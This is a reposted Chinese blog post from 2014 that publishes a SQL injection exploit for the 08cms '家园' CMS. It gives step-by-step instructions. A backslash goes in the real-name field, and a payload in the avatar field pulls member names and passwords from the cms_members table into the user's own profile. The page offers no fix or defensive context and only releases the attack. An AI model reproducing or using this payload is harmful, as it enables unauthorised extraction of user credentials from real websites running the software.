08cms家园系统源码注入漏洞 -中国寒龙出品

时间：2014-12-19 01:50:09 阅读：539 评论：0 收藏：0 [点我收藏+]

# Title ：08cms家园系统注入漏洞
# Team ：08 Security Team
# Author ：08安全团队
# 首发： 08安全团队
#######################################
这个漏洞在5月份已经审计出来了，现在将漏洞放出来。
注册一个账号会员资料->基本资料查看表单得到自己的 MID
在真实姓名填写 \
头像填写

1	,company=(SELECT CONCAT(mname,0x7c,PASSWORD) FROM cms_members limit 0,1) WHERE MID=331

08cms家园系统源码注入漏洞 -中国寒龙出品

原文：http://www.cnblogs.com/Hkadmin/p/4173004.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)